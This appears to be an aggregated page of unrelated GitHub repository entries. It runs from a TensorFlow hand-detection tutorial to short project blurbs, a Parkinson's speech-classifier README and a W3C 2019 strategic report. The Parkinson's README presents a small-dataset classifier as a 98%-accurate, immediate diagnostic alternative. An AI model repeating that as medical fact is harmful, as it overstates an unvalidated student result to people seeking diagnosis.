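        'image/object/class/label': tf.train.Feature(int64_list=tf.train.Int64List(value=[1])),  # single 'hand' class
    }
    return tf.train.Example(features=tf.train.Features(feature=feature))

# writer = tf.python_io.TFRecordWriter('train.record')
# writer.write(create_tf_example(row, encoded_jpg, w, h).SerializeToString())
# writer.close()
```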
> **Training on your own images**: Please use the [guide provided by Harrison from pythonprogramming](https://pythonprogramming.net/training-custom-objects-tensorflow-object-detection-api-tutorial/) on how to generate tfrecords given your label csv files and your images. The guide also covers how to start the training process if training locally [see [here](https://pythonprogramming.net/training-custom-objects-tensorflow-object-detection-api-tutorial/)]. If training in the cloud using a service like GCP, see the [guide here](https://github.com/tensorflow/models/blob/master/research/object_detection/g3doc/running_on_cloud.md). As the training process progresses, the expectation is that total loss (error) gets reduced to its possible minimum (about a value of 1 or thereabouts). By observing the tensorboard graphs for total loss (see image below), it should be possible to get an idea of when the training process is complete (total loss does not decrease with further iterations/steps). I ran my training job for 200k steps (took about 5 hours) and stopped at a total loss (error) value of 2.575. (In retrospect, I could have stopped the training at about 50k steps and gotten a similar total loss value.) With tensorflow, you can also run an evaluation concurrently that assesses your model to see how well it performs on the test data. A commonly used metric for performance is mean average precision (mAP), which is a single number used to summarize the area under the precision-recall curve. mAP is a measure of how well the model generates a bounding box that has at least a 50% overlap with the ground truth bounding box in our test dataset. For the hand detector trained here, the mAP value was **0.9686@0.5IOU**. mAP values range from 0-1; the higher the better. <img src="images/accuracy.jpg" width="100%"> Once training is completed, the trained inference graph (`frozen_inference_graph.pb`) is then exported (see the earlier referenced guides for how to do this) and saved in the `hand_inference_graph` folder. Now it's time to do some interesting detection. ## Using the Detector to Detect/Track hands If you have not done this yet, please follow the guide on installing [Tensorflow and the Tensorflow object detection api](https://github.com/tensorflow/models/blob/master/research/object_detection/g3doc/installation.md). This will walk you through setting up the tensorflow framework and cloning the tensorflow github repo. The detection code then proceeds in three steps: - Load the `frozen_inference_graph.pb` trained on the hands dataset as well as the corresponding label map. In this repo, this is done in the `utils/detector_utils.py` script by the `load_inference_graph` method.
```python
detection_graph = tf.Graph()
with detection_graph.as_default():
    od_graph_def = tf.GraphDef()
    with tf.gfile.GFile(PATH_TO_CKPT, 'rb') as fid:
        serialized_graph = fid.read()
        od_graph_def.ParseFromString(serialized_graph)
        tf.import_graph_def(od_graph_def, name='')
    sess = tf.Session(graph=detection_graph)
print("> ====== Hand Inference graph loaded.")
```
- Detect hands. In this repo, this is done in the `utils/detector_utils.py` script by the `detect_objects` method.
```python
(boxes, scores, classes, num) = sess.run(
    [detection_boxes, detection_scores, detection_classes, num_detections],
    feed_dict={image_tensor: image_np_expanded})
```
- Visualize the detected bounding boxes. In this repo, this is done in the `utils/detector_utils.py` script by the `draw_box_on_image` method. This repo contains two scripts that tie all these steps together.
- detect_multi_threaded.py: A threaded implementation for reading camera video input and running detection. Takes a set of command line flags to set parameters such as `--display` (visualize detections), image parameters `--width` and `--height`, and the video `--source` (0 for camera) etc. - detect_single_threaded.py: Same as above, but single threaded. This script works for video files by setting the video source parameter `--source` (path to a video file).
```cmd
# load and run detection on video at path "videos/chess.mov"
python detect_single_threaded.py --source videos/chess.mov
```
> Update: If you do have errors loading the frozen inference graph in this repo, feel free to generate a new graph that fits your TF version from the model-checkpoint in this repo. Use the [export_inference_graph.py](https://github.com/tensorflow/models/blob/master/research/object_detection/export_inference_graph.py) script provided in the tensorflow object detection api repo. More guidance on this [here](https://pythonprogramming.net/testing-custom-object-detector-tensorflow-object-detection-api-tutorial/?completed=/training-custom-objects-tensorflow-object-detection-api-tutorial/). ## Thoughts on Optimization. A few things that led to noticeable performance increases. - Threading: It turns out that reading images from a webcam is a heavy I/O operation and, if run on the main application thread, can slow down the program. I implemented some good ideas from [Adrian Rosebrock](https://www.pyimagesearch.com/2017/02/06/faster-video-file-fps-with-cv2-videocapture-and-opencv/) on parallelizing image capture across multiple worker threads (a minimal sketch of this pattern is given at the end of this post). This mostly led to an FPS increase of about 5 points. - For those new to Opencv, images from the `cv2.read()` method are returned in [BGR format](https://www.learnopencv.com/why-does-opencv-use-bgr-color-format/). Ensure you convert to RGB before detection (accuracy will be much reduced if you don't).
```python
cv2.cvtColor(image_np, cv2.COLOR_BGR2RGB)
```
- Keeping your input image small will increase fps without any significant accuracy drop. (I used about 320 x 240, compared to the 1280 x 720 which my webcam provides.) - Model quantization: moving from the current 32-bit representation to 8-bit can achieve up to a 4x reduction in the memory required to load and store models. One way to further speed up this model is to explore the use of [8-bit fixed point quantization](https://heartbeat.fritz.ai/8-bit-quantization-and-tensorflow-lite-speeding-up-mobile-inference-with-low-precision-a882dfcafbbd). Performance can also be increased by a clever combination of tracking algorithms with the already decent detection, and this is something I am still experimenting with. Have ideas for optimizing better? Please share! <img src="images/general.jpg" width="100%"> Note: The detector does reflect some limitations associated with the training set. These include non-egocentric viewpoints, very noisy backgrounds (e.g. in a sea of hands) and sometimes skin tone. There is opportunity to improve these with additional data. ## Integrating Multiple DNNs. One way to make things more interesting is to integrate our new knowledge of where "hands" are with other detectors trained to recognize other objects. Unfortunately, while our hand detector can in fact detect hands, it cannot detect other objects (a consequence of how it is trained). To create a detector that classifies multiple different objects would mean a long, involved process of assembling datasets for each class and a lengthy training process.
> Given the above, a potential strategy is to explore structures that allow us to **efficiently** interleave output from multiple pretrained models for various object classes and have them detect multiple objects on a single image. An example of this is my primary use case, where I am interested in understanding the position of objects on a table with respect to hands on the same table. I am currently doing some work on a threaded application that loads multiple detectors and outputs bounding boxes on a single image. More on this soon.
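As referenced in the optimization notes above, here is a minimal sketch of the threaded-capture pattern, assuming only OpenCV and the Python standard library. The `WebcamStream` class and its methods are illustrative names, not this repo's exact code; see `detect_multi_threaded.py` for the real implementation.
```python
import threading
import cv2

class WebcamStream:
    # Reads frames on a worker thread so the main thread only runs detection.
    def __init__(self, src=0):
        self.cap = cv2.VideoCapture(src)
        self.grabbed, self.frame = self.cap.read()
        self.stopped = False
        self.thread = threading.Thread(target=self._update, daemon=True)
        self.thread.start()

    def _update(self):
        # Camera I/O is the bottleneck; keep grabbing frames off the main thread.
        while not self.stopped:
            self.grabbed, self.frame = self.cap.read()

    def read(self):
        return self.frame  # always the most recently grabbed frame

    def stop(self):
        self.stopped = True
        self.thread.join()
        self.cap.release()

stream = WebcamStream(0)
while True:
    frame = stream.read()
    rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)  # the detector expects RGB input
    # boxes, scores = detector_utils.detect_objects(rgb, detection_graph, sess)
    cv2.imshow('frame', frame)
    if cv2.waitKey(1) & 0xFF == ord('q'):
        break
stream.stop()
cv2.destroyAllWindows()
```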
penn-graphics-research / Ziran2019Visco-elasto-plasticity and fracture simulator with the material point method (MPM) -- the reference implementation of the SIGGRAPH 2019 technical papers Silly Rubber and CD-MPM.
conorluddy / LiquidGlassReferenceiOS 26 Liquid Glass: Ultimate Swift/SwiftUI Reference. This is really just a document I can point Claude at when I want to make glass. conor.fyi/writing/liquid-glass-reference
Aastha2104 / Parkinson Disease PredictionIntroduction Parkinson’s Disease is the second most prevalent neurodegenerative disorder after Alzheimer’s, affecting more than 10 million people worldwide. Parkinson’s is characterized primarily by the deterioration of motor and cognitive ability. There is no single test which can be administered for diagnosis. Instead, doctors must perform a careful clinical analysis of the patient’s medical history. Unfortunately, this method of diagnosis is highly inaccurate. A study from the National Institute of Neurological Disorders finds that early diagnosis (having symptoms for 5 years or less) is only 53% accurate. This is not much better than random guessing, but an early diagnosis is critical to effective treatment. Because of these difficulties, I investigate a machine learning approach to accurately diagnose Parkinson’s, using a dataset of various speech features (a non-invasive yet characteristic tool) from the University of Oxford. Why speech features? Speech is very predictive and characteristic of Parkinson’s disease; almost every Parkinson’s patient experiences severe vocal degradation (inability to produce sustained phonations, tremor, hoarseness), so it makes sense to use voice to diagnose the disease. Voice analysis gives the added benefit of being non-invasive, inexpensive, and very easy to extract clinically. Background Parkinson's Disease Parkinson’s is a progressive neurodegenerative condition resulting from the death of the dopamine-containing cells of the substantia nigra (which plays an important role in movement). Symptoms include: “frozen” facial features, bradykinesia (slowness of movement), akinesia (impairment of voluntary movement), tremor, and voice impairment. Typically, by the time the disease is diagnosed, 60% of nigrostriatal neurons have degenerated, and 80% of striatal dopamine has been depleted. Performance Metrics TP = true positive, FP = false positive, TN = true negative, FN = false negative Accuracy: (TP+TN)/(P+N) Matthews Correlation Coefficient: MCC = (TP*TN - FP*FN) / sqrt((TP+FP)(TP+FN)(TN+FP)(TN+FN)); 1 = perfect, 0 = random, -1 = completely inaccurate Algorithms Employed Logistic Regression (LR): Uses the sigmoid logistic equation with weights (coefficient values) and biases (constants) to model the probability of a certain class for binary classification. An output of 1 represents one class, and an output of 0 represents the other. Training the model will learn the optimal weights and biases. Linear Discriminant Analysis (LDA): Assumes that the data is Gaussian and each feature has the same variance. LDA estimates the mean and variance for each class from the training data, and then uses properties of statistics (Bayes theorem, Gaussian distribution, etc.) to compute the probability of a particular instance belonging to a given class. The class with the largest probability is the prediction. k Nearest Neighbors (KNN): Makes predictions about the validation set using the entire training set. KNN makes a prediction about a new instance by searching through the entire set to find the k “closest” instances. “Closeness” is determined using a proximity measurement (Euclidean) across all features. The class that the majority of the k closest instances belong to is the class that the model predicts the new instance to be. Decision Tree (DT): Represented by a binary tree, where each internal node represents an input variable and a split point, and each leaf node contains an output used to make a prediction. Neural Network (NN): Models the way the human brain makes decisions.
Each neuron takes in 1+ inputs, and then uses an activation function to process the input with weights and biases to produce an output. Neurons can be arranged into layers, and multiple layers can form a network to model complex decisions. Training the network involves using the training instances to optimize the weights and biases. Naive Bayes (NB): Simplifies the calculation of probabilities by assuming that all features are independent of one another (a strong but effective assumption). Employs Bayes Theorem to calculate the probabilities that the instance to be predicted is in each class, then finds the class with the highest probability. Gradient Boost (GB): Generally used when seeking a model with very high predictive performance. Used to reduce bias and variance (“error”) by combining multiple “weak learners” (not very good models) to create a “strong learner” (high performance model). Involves 3 elements: a loss function (error function) to be optimized, a weak learner (decision tree) to make predictions, and an additive model to add trees to minimize the loss function. Gradient descent is used to minimize error after adding each tree (one by one). Engineering Goal Produce a machine learning model to diagnose Parkinson’s disease given various features of a patient’s speech with at least 90% accuracy and/or a Matthews Correlation Coefficient of at least 0.9. Compare various algorithms and parameters to determine the best model for predicting Parkinson’s. Dataset Description Source: the University of Oxford 195 instances (147 subjects with Parkinson’s, 48 without Parkinson’s) 22 features (elements that are possibly characteristic of Parkinson’s, such as frequency, pitch, amplitude / period of the sound wave) 1 label (1 for Parkinson’s, 0 for no Parkinson’s) Project Pipeline Summary of Procedure Split the Oxford Parkinson’s Dataset into two parts: one for training, one for validation (to evaluate how well the model performs) Train each of the following algorithms with the training set: Logistic Regression, Linear Discriminant Analysis, k Nearest Neighbors, Decision Tree, Neural Network, Naive Bayes, Gradient Boost Evaluate results using the validation set Repeat for the following training set to validation set splits: 80% training / 20% validation, 75% / 25%, and 70% / 30% Repeat for a rescaled version of the dataset (scale all the numbers in the dataset to a range from 0 to 1: this helps to reduce the effect of outliers) Conduct 5 trials and average the results (a minimal scikit-learn sketch of this procedure is given at the end of this entry, after the references) Data Analysis In general, the models tended to perform the best (both in terms of accuracy and Matthews Correlation Coefficient) on the rescaled dataset with a 75-25 train-test split. The two highest performing algorithms, k Nearest Neighbors and the Neural Network, both achieved an accuracy of 98%. The NN achieved an MCC of 0.96, while KNN achieved an MCC of 0.94. These figures outperform most existing literature and significantly outperform current methods of diagnosis. Conclusion and Significance These robust results suggest that a machine learning approach can indeed be implemented to significantly improve diagnosis methods of Parkinson’s disease. Given the necessity of early diagnosis for effective treatment, my machine learning models provide a very promising alternative to the current, rather ineffective method of diagnosis. Current methods of early diagnosis are only 53% accurate, while my machine learning model produces 98% accuracy.
This 45-percentage-point increase is critical because an accurate, early diagnosis is needed to effectively treat the disease. Typically, by the time the disease is diagnosed, 60% of nigrostriatal neurons have degenerated, and 80% of striatal dopamine has been depleted. With an earlier diagnosis, much of this degradation could be slowed or treated. My results are very significant because Parkinson’s affects over 10 million people worldwide who could benefit greatly from an early, accurate diagnosis. Not only is my machine learning approach more accurate in terms of diagnostic accuracy, it is also more scalable, less expensive, and therefore more accessible to people who might not have access to established medical facilities and professionals. The diagnosis is also much simpler, requiring only a 10-15 second voice recording and producing an immediate diagnosis. Future Research Given more time and resources, I would investigate the following: Create a mobile application which would allow the user to record his/her voice, extract the necessary vocal features, and feed them into my machine learning model to diagnose Parkinson’s. Use larger datasets in conjunction with the University of Oxford dataset. Tune and improve my models even further to achieve even better results. Investigate different structures and types of neural networks. Construct a novel algorithm specifically suited for the prediction of Parkinson’s. Generalize my findings and algorithms for all types of dementia disorders, such as Alzheimer’s. References Bind, Shubham. "A Survey of Machine Learning Based Approaches for Parkinson Disease Prediction." International Journal of Computer Science and Information Technologies 6 (2015): n. pag. International Journal of Computer Science and Information Technologies. 2015. Web. 8 Mar. 2017. Brooks, Megan. "Diagnosing Parkinson's Disease Still Challenging." Medscape Medical News. National Institute of Neurological Disorders, 31 July 2014. Web. 20 Mar. 2017. "Exploiting Nonlinear Recurrence and Fractal Scaling Properties for Voice Disorder Detection." Little MA, McSharry PE, Roberts SJ, Costello DAE, Moroz IM. BioMedical Engineering OnLine 2007, 6:23 (26 June 2007). Hashmi, Sumaiya F. "A Machine Learning Approach to Diagnosis of Parkinson’s Disease." Claremont Colleges Scholarship. Claremont College, 2013. Web. 10 Mar. 2017. Karplus, Abraham. "Machine Learning Algorithms for Cancer Diagnosis." Machine Learning Algorithms for Cancer Diagnosis (n.d.): n. pag. Mar. 2012. Web. 20 Mar. 2017. Little, Max. "Parkinsons Data Set." UCI Machine Learning Repository. University of Oxford, 26 June 2008. Web. 20 Feb. 2017. Ozcift, Akin, and Arif Gulten. "Classifier Ensemble Construction with Rotation Forest to Improve Medical Diagnosis Performance of Machine Learning Algorithms." Computer Methods and Programs in Biomedicine 104.3 (2011): 443-51. Semantic Scholar. 2011. Web. 15 Mar. 2017. "Parkinson’s Disease Dementia." UCI MIND. N.p., 19 Oct. 2015. Web. 17 Feb. 2017. Salvatore, C., A. Cerasa, I. Castiglioni, F. Gallivanone, A. Augimeri, M. Lopez, G. Arabia, M. Morelli, M.c. Gilardi, and A. Quattrone. "Machine Learning on Brain MRI Data for Differential Diagnosis of Parkinson's Disease and Progressive Supranuclear Palsy." Journal of Neuroscience Methods 222 (2014): 230-37. 2014. Web. 18 Mar. 2017. Shahbakhi, Mohammad, Danial Taheri Far, and Ehsan Tahami.
"Speech Analysis for Diagnosis of Parkinson’s Disease Using Genetic Algorithm and Support Vector Machine."Journal of Biomedical Science and Engineering 07.04 (2014): 147-56. Scientific Research. July 2014. Web. 2 Mar. 2017. "Speech and Communication." Speech and Communication. Parkinson's Disease Foundation, n.d. Web. 22 Mar. 2017. Sriram, Tarigoppula V. S., M. Venkateswara Rao, G. V. Satya Narayana, and D. S. V. G. K. Kaladhar. "Diagnosis of Parkinson Disease Using Machine Learning and Data Mining Systems from Voice Dataset." SpringerLink. Springer, Cham, 01 Jan. 1970. Web. 17 Mar. 2017.
eldar / Differentiable Point CloudsThe reference implementation of "Unsupervised Learning of Shape and Pose with Differentiable Point Clouds"
Gregjksmith / Iterative Closest PointImplementation of the iterative closest point algorithm. A point cloud is transformed such that it best matches a reference point cloud.
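For readers unfamiliar with ICP, here is a minimal numpy/scipy sketch of the classic point-to-point variant (nearest-neighbor matching plus an SVD-based rigid fit); it is illustrative only, not this repository's implementation.
```python
import numpy as np
from scipy.spatial import cKDTree

def best_fit_transform(A, B):
    # Least-squares rigid transform (R, t) mapping points A onto points B (Kabsch/SVD).
    ca, cb = A.mean(axis=0), B.mean(axis=0)
    H = (A - ca).T @ (B - cb)
    U, _, Vt = np.linalg.svd(H)
    R = Vt.T @ U.T
    if np.linalg.det(R) < 0:       # guard against a reflection solution
        Vt[-1, :] *= -1
        R = Vt.T @ U.T
    t = cb - R @ ca
    return R, t

def icp(source, reference, iters=50, tol=1e-6):
    # Iteratively align `source` (N x 3) to `reference` (M x 3).
    tree = cKDTree(reference)
    src = source.copy()
    prev_err = np.inf
    for _ in range(iters):
        dist, idx = tree.query(src)              # nearest reference point per source point
        R, t = best_fit_transform(src, reference[idx])
        src = src @ R.T + t                      # apply the incremental transform
        err = dist.mean()
        if abs(prev_err - err) < tol:            # stop once the error plateaus
            break
        prev_err = err
    return src
```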
jettbrains / L W3C Strategic Highlights September 2019 This report was prepared for the September 2019 W3C Advisory Committee Meeting (W3C Member link). See the accompanying W3C Fact Sheet — September 2019. For the previous edition, see the April 2019 W3C Strategic Highlights. For future editions of this report, please consult the latest version. A Chinese translation is available. Contents Introduction Future Web Standards Meeting Industry Needs Web Payments Digital Publishing Media and Entertainment Web & Telecommunications Real-Time Communications (WebRTC) Web & Networks Automotive Web of Things Strengthening the Core of the Web HTML CSS Fonts SVG Audio Performance Web Performance WebAssembly Testing Browser Testing and Tools WebPlatform Tests Web of Data Web for All Security, Privacy, Identity Internationalization (i18n) Web Accessibility Outreach to the world W3C Developer Relations W3C Training Translations W3C Liaisons Introduction This report highlights recent work to enhance the existing landscape of the Web platform and to innovate for the growth and strength of the Web. 33 working groups and a dozen interest groups enable W3C to pursue its mission through the creation of Web standards, guidelines, and supporting materials. We track the tremendous work done across the Consortium through homogeneous workspaces in GitHub, which enable better monitoring and management. We are in the middle of a period where we are chartering numerous working groups, which demonstrates the rapid pace of change for the Web platform: After 4 years, we are nearly ready to publish a Payment Request API Proposed Recommendation, and we will soon need to charter follow-on work. In the last year we chartered the Web Payment Security Interest Group. In the last year we chartered the Web Media Working Group with 7 specifications for next-generation media support on the Web. We have Accessibility Guidelines under W3C Member review, which include Silver, a new approach. We have just launched the Decentralized Identifier Working Group, which has tremendous potential because a Decentralized Identifier (DID) is an identifier that is globally unique, resolvable with high availability, and cryptographically verifiable. We have Privacy IG (PING) under W3C Member review, which strengthens our focus on the tradeoff between privacy and function. We have a new CSS charter under W3C Member review, which maps the group's work for the next three years. In this period, W3C and the WHATWG have successfully completed the negotiation of a Memorandum of Understanding rooted in the mutual belief that having two distinct specifications claiming to be normative is generally harmful for the Web community. The MOU, signed last May, describes how the two organizations are to collaborate on the development of a single authoritative version of the HTML and DOM specifications. W3C subsequently rechartered the HTML Working Group to assist the W3C community in raising issues and proposing solutions for the HTML and DOM specifications, and for the production of W3C Recommendations from WHATWG Review Drafts. As the Web evolves continuously, some groups are looking for ways for specifications to do so as well. So-called "evergreen recommendations" or "living standards" aim to track continuous development (and maintenance) of features, on a feature-by-feature basis, while getting review and patent commitments. We see the maturation and further development of an incredible number of new technologies coming to the Web.
Continued progress in many areas demonstrates the vitality of the W3C and the Web community, as the rest of the report illustrates. Future Web Standards W3C has a variety of mechanisms for listening to what the community thinks could become good future Web standards. These include discussions with the Membership, discussions with other standards bodies, the activities of thousands of participants in over 300 community groups, and W3C Workshops. There are lots of good ideas. The W3C strategy team has been identifying promising topics and invites public participation. Future, recent, and under-consideration Workshops include: Inclusive XR (5-6 November 2019, Seattle, WA, USA) to explore existing and future approaches on making Virtual and Augmented Reality experiences more inclusive, including to people with disabilities; W3C Workshop on Data Models for Transportation (12-13 September 2019, Palo Alto, CA, USA) W3C Workshop on Web Games (27-28 June 2019, Redmond, WA, USA), view report Second W3C Workshop on the Web of Things (3-5 June 2019, Munich, Germany) W3C Workshop on Web Standardization for Graph Data; Creating Bridges: RDF, Property Graph and SQL (4-6 March 2019, Berlin, Germany), view report Web & Machine Learning. The Strategy Funnel documents the staff's exploration of potential new work at various phases: Exploration and Investigation, Incubation and Evaluation, and eventually the chartering of a new standards group. The Funnel view is a GitHub Project where new areas are issues represented by “cards” which move through the columns, usually from left to right. Most cards start in Exploration and move towards Chartering, or move out of the funnel. Public input is welcome at any stage, but particularly once Incubation has begun. This helps W3C identify work that is sufficiently incubated to warrant standardization, review the ecosystem around the work and indicate interest in participating in its standardization, and then draft a charter that reflects an appropriate scope. Ongoing feedback can speed up the overall standardization process. Since the previous highlights document, W3C has chartered a number of groups, and started discussion on many more: Newly Chartered or Rechartered Web Application Security WG (03-Apr) Web Payment Security IG (17-Apr) Patent and Standards IG (24-Apr) Web Applications WG (14-May) Web & Networks IG (16-May) Media WG (23-May) Media and Entertainment IG (06-Jun) HTML WG (06-Jun) Decentralized Identifier WG (05-Sep) Extended Privacy IG (PING) (30-Sep) Verifiable Claims WG (30-Sep) Service Workers WG (31-Dec) Dataset Exchange WG (31-Dec) Web of Things Working Group (31-Dec) Web Audio Working Group (31-Dec) Proposed charters / Advance Notice Accessibility Guidelines WG Privacy IG (PING) RDF Literal Direction WG Timed Text WG CSS WG Web Authentication WG Closed Internationalization Tag Set IG Meeting Industry Needs Web Payments All Web Payments specifications W3C's payments standards enable a streamlined checkout experience, enabling a consistent user experience across the Web with lower front-end development costs for merchants. Users can store and reuse information and more quickly and accurately complete online transactions. The Web Payments Working Group has republished Payment Request API as a Candidate Recommendation, aiming to publish a Proposed Recommendation in Fall 2019, and is discussing use cases and features for Payment Request after publication of the 1.0 Recommendation.
Browser vendors have been finalizing implementation of features added in the past year (view the implementation report). As work continues on the Payment Handler API and its implementation (currently in Chrome and Edge Canary), one focus in 2019 is to increase adoption in other browsers. Recently, Mastercard demonstrated the use of Payment Request API to carry out EMVCo's Secure Remote Commerce (SRC) protocol, whose payment method definition is being developed with active participation by Visa, Mastercard, American Express, and Discover. Payment method availability is a key factor in merchant considerations about adopting Payment Request API. The ability to get uniform adoption of a new payment method such as Secure Remote Commerce (SRC) also depends on the availability of the Payment Handler API in browsers, or of proprietary alternatives. Web Monetization, which the Web Payments Working Group will discuss again at its face-to-face meeting in September, can be used to enable micropayments as an alternative revenue stream to advertising. Since the beginning of 2019, Amazon, Brave Software, JCB, Certus Cybersecurity Solutions and Netflix have joined the Web Payments Working Group. In April, W3C launched the Web Payment Security Interest Group to enable W3C, EMVCo, and the FIDO Alliance to collaborate on a vision for Web payment security and interoperability. Participants will define areas of collaboration and identify gaps between existing technical specifications in order to increase compatibility among different technologies, such as: How do SRC, FIDO, and Payment Request relate? The Payment Services Directive 2 (PSD2) regulations in Europe are scheduled to take effect in September 2019. What is the role of EMVCo, W3C, and FIDO technologies, and what is the current state of readiness for the deadline? How can we improve privacy on the Web at the same time as we meet industry requirements regarding user identity? Digital Publishing All Digital Publishing specifications, Publication milestones The Web is the universal publishing platform. Publishing is increasingly impacted by the Web, and the Web increasingly impacts Publishing. Topics of particular interest to Publishing@W3C include typography and layout, accessibility, usability, portability, distribution, archiving, offline access, print on demand, and reliable cross-referencing. The diverse publishing community represented in the groups consists of traditional "trade" publishers and ebook reading system manufacturers, but also publishers of audiobooks, scholarly journals and educational materials, library scientists, and browser developers. The Publishing Working Group currently concentrates on audiobooks, which lack a comprehensive standard, thus incurring extra costs and time to publish in this booming market. Active development is ongoing on the future standard: Publication Manifest Audiobook profile for Web Publications Lightweight Packaging Format The BD Comics Manga Community Group, the Synchronized Multimedia for Publications Community Group, the Publishing Community Group and a future group on archival are companions to the working group where specific work is developed and incubated. The Publishing Community Group is a recently launched incubation channel for Publishing@W3C. The goal of the group is to propose, document, and prototype features broadly related to: publications on the Web reading modes and systems and the user experience of publications The EPUB 3 Community Group has successfully completed the revision of EPUB 3.2.
The Publishing Business Group fosters ongoing participation by members of the publishing industry and the overall ecosystem in the development of Web infrastructure to better support the needs of the industry. The Business Group serves as an additional conduit to the Publishing Working Group and several Community Groups for feedback between the publishing ecosystem and W3C. The Publishing BG has played a vital role in fostering and advancing the adoption and continued development of EPUB 3. In particular, the BG provided critical support to the update of EPUBCheck to validate EPUB content against the new EPUB 3.2 specification. This resulted in the development, in conjunction with the EPUB 3 Community Group, of a new generation of EPUBCheck: the production-ready EPUBCheck 4.2 release. Media and Entertainment All Media specifications The Media and Entertainment vertical tracks media-related topics and features that create immersive experiences for end users. HTML5 brought standard audio and video elements to the Web. Standardization activities since then have aimed at turning the Web into a professional platform fully suitable for the delivery of media content and associated materials, adding previously missing features needed to stream video content on the Web, such as adaptive streaming and content protection. Together with Microsoft, Comcast, Netflix and Google, W3C received a Technology & Engineering Emmy Award in April 2019 for standardization of a full TV experience on the Web. Current goals are to: Reinforce core media technologies: Creation of the Media Working Group, to develop media-related specifications incubated in the WICG (e.g. Media Capabilities, Picture-in-picture, Media Session) and maintain/evolve Media Source Extensions (MSE) and Encrypted Media Extensions (EME). Improve support for Media Timed Events: data cues incubation. Enhance color support (HDR, wide gamut), in scope of the CSS WG and in the Color on the Web CG. Reduce fragmentation: Continue annual releases of a common and testable baseline for media devices, in scope of the Web Media APIs CG and in collaboration with the CTA WAVE Project. Maintain the Roadmap of Media Technologies for the Web, which highlights Web technologies that can be used to build media applications and services, as well as known gaps to enable additional use cases. Create the future: Discuss perspectives for Media and Entertainment for the Web. Bring the power of GPUs to the Web (graphics, machine learning, heavy processing), under incubation in the GPU for the Web CG. Transition to a Working Group is under discussion. Determine next steps after the successful W3C Workshop on Web Games of June 2019. View the report. Timed Text The Timed Text Working Group develops and maintains formats used for the representation of text synchronized with other timed media, like audio and video, and notably works on TTML, profiles of TTML, and WebVTT. Recent progress includes: A robust WebVTT implementation report poises the specification for publication as a Proposed Recommendation. Discussions around rechartering, notably to add a TTML Profile for Audio Description deliverable to the scope of the group, and to clarify that rendering of captions within XR content is also in scope. Immersive Web Hardware that enables Virtual Reality (VR) and Augmented Reality (AR) applications is now broadly available to consumers, offering an immersive computing platform with both new opportunities and challenges.
The ability to interact directly with immersive hardware is critical to ensuring that the web is well equipped to operate as a first-class citizen in this environment. The Immersive Web Working Group has been stabilizing the WebXR Device API while the companion Immersive Web Community Group incubates the next series of features identified as key for the future of the Immersive Web. W3C plans a workshop focused on the needs and benefits at the intersection of VR & Accessibility (Inclusive XR), on 5-6 November 2019 in Seattle, WA, USA, to explore existing and future approaches to making Virtual and Augmented Reality experiences more inclusive. Web & Telecommunications The Web is the Open Platform for Mobile. Telecommunication service providers and network equipment providers have long been critical actors in the deployment of Web technologies. As the Web platform matures, it brings richer and richer capabilities to extend existing services to new users and devices, and to propose new and innovative services. Real-Time Communications (WebRTC) All Real-Time Communications specifications WebRTC has reshaped the whole communication landscape by making any connected device a potential communication end-point, bringing audio and video communications anywhere, on any network, vastly expanding the ability of operators to reach their customers. WebRTC serves as the cornerstone of many online communication and collaboration services. The WebRTC Working Group aims to bring WebRTC 1.0 (and the companion specification Media Capture and Streams) to Recommendation by the end of 2019. Intense efforts are focused on testing (supported by a dedicated hackathon at IETF 104) and interoperability. The group is considering moving features that have not gotten enough traction into separate modules or deferring them to a later minor revision of the spec. Beyond WebRTC 1.0, the WebRTC Working Group will focus its efforts on WebRTC NV, which the group has started documenting by identifying use cases. Web & Networks Recently launched, in the wake of the May 2018 Web5G workshop, the Web & Networks Interest Group is chaired by representatives from AT&T, China Mobile and Intel, with a goal to explore solutions for web applications to achieve better performance and resource allocation, both on the device and the network. The group's first efforts are around use cases, privacy & security requirements, and liaisons. Automotive All Automotive specifications To create a rich application ecosystem for vehicles and other devices allowed to connect to the vehicle, the W3C Automotive Working Group is delivering a service specification to expose all common vehicle signals (engine temperature, fuel/charge level, range, tire pressure, speed, etc.). The Vehicle Information Service Specification (VISS), which is a Candidate Recommendation, is seeing more implementations across the industry. It provides the access method to a common data model for all the vehicle signals (presently encapsulating a thousand or so different data elements) and will grow to accommodate advances in automotive such as autonomous and driver-assist technologies and electrification. The group is already working on a successor to VISS, leveraging the underlying data model and the VIWI submission from Volkswagen, for a more robust means of accessing vehicle signals information and applying the same paradigm to other automotive needs including location-based services, media, notifications and caching content.
The Automotive and Web Platform Business Group acts as an incubator for prospective standards work. One of its task forces is using W3C VISS to perform data sampling and off-board the information to the cloud. Access to the wealth of information that W3C's auto signals standard exposes is of interest to regulators, urban planners, insurance companies, auto manufacturers, fleet managers and owners, service providers and others. In addition to the components needed for data sampling and edge computing, capturing user and owner consent, information collection methods and the handling of data are in scope. The upcoming W3C Workshop on Data Models for Transportation (September 2019) is expected to focus on the need for additional ontologies around the transportation space. Web of Things All Web of Things specifications W3C's Web of Things work is designed to bridge disparate technology stacks to allow devices to work together and achieve scale, thus enabling the potential of the Internet of Things by eliminating fragmentation and fostering interoperability. Thing Descriptions, expressed in JSON-LD, cover the behavior, interaction affordances, data schema, security configuration, and protocol bindings. The Web of Things complements existing IoT ecosystems to reduce the cost and risk for suppliers and consumers of applications that create value by combining multiple devices and information services. There are many sectors that will benefit, e.g. smart homes, smart cities, smart industry, smart agriculture, smart healthcare and many more. The Web of Things Working Group is finishing the initial Web of Things standards, with support from the Web of Things Interest Group: Web of Things Architecture Thing Descriptions Strengthening the Core of the Web HTML The HTML Working Group was chartered in early June to assist the W3C community in raising issues and proposing solutions for the HTML and DOM specifications, and to produce W3C Recommendations from WHATWG Review Drafts. A few days before, W3C and the WHATWG signed a Memorandum of Understanding outlining the agreement to collaborate on the development of a single version of the HTML and DOM specifications. Issues and proposed solutions for HTML and DOM are handled via the newly rechartered HTML Working Group in the WHATWG repositories. The HTML Working Group is targeting November 2019 to bring HTML and DOM to Candidate Recommendation. CSS All CSS specifications CSS is a critical part of the Open Web Platform. The CSS Working Group gathers requirements from two large groups of CSS users: the publishing industry and application developers. Within W3C, those groups are exemplified by the Publishing groups and the Web Platform Working Group. The former requires things like better pagination support and advanced font handling; the latter needs intelligent (and fast!) scrolling and animations. What we know as CSS is actually a collection of almost a hundred specifications, referred to as ‘modules’. The current state of CSS is defined by a snapshot, updated once a year. The group also publishes an index defining every term defined by the CSS specifications. Fonts All Fonts specifications The Web Fonts Working Group develops specifications that allow the interoperable deployment of downloadable fonts on the Web, with a focus on Progressive Font Enrichment as well as maintenance of the WOFF Recommendations.
